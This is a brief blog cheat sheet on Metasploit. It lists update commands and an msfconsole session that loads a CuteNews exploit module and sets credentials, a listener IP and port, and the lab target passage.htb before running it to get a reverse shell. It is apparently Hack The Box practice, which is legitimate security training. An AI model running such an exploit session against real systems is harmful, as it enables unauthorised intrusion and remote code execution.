Post

Meow's Testing Tools - Metasploit

Metasploit

[toc]


Metasploit-help-command-1

bacis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

# Updating Metasploit
apt-get update
apt-get upgrade
apt-get dist-upgrade
msfupdate


msfconsole
msf5 > searchsploit cutenews
msf5 > use php/webapps/46698.rb

# show you the available parameters for an exploit if used when the command line is in exploit context.
msf > show options

msf5 exploit(php/webapps/46698) > set lport 4444
lport => 4444
msf5 exploit(php/webapps/46698) > set password atlanta1
password => atlanta1
msf5 exploit(php/webapps/46698) > set username paul-coles
username => paul-coles
msf5 exploit(php/webapps/46698) > ifconfig
msf5 exploit(php/webapps/46698) > set lhost 10.10.15.74
lhost => 10.10.15.74
msf5 exploit(php/webapps/46698) > set rhosts passage.htb
rhosts => passage.htb

run


.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.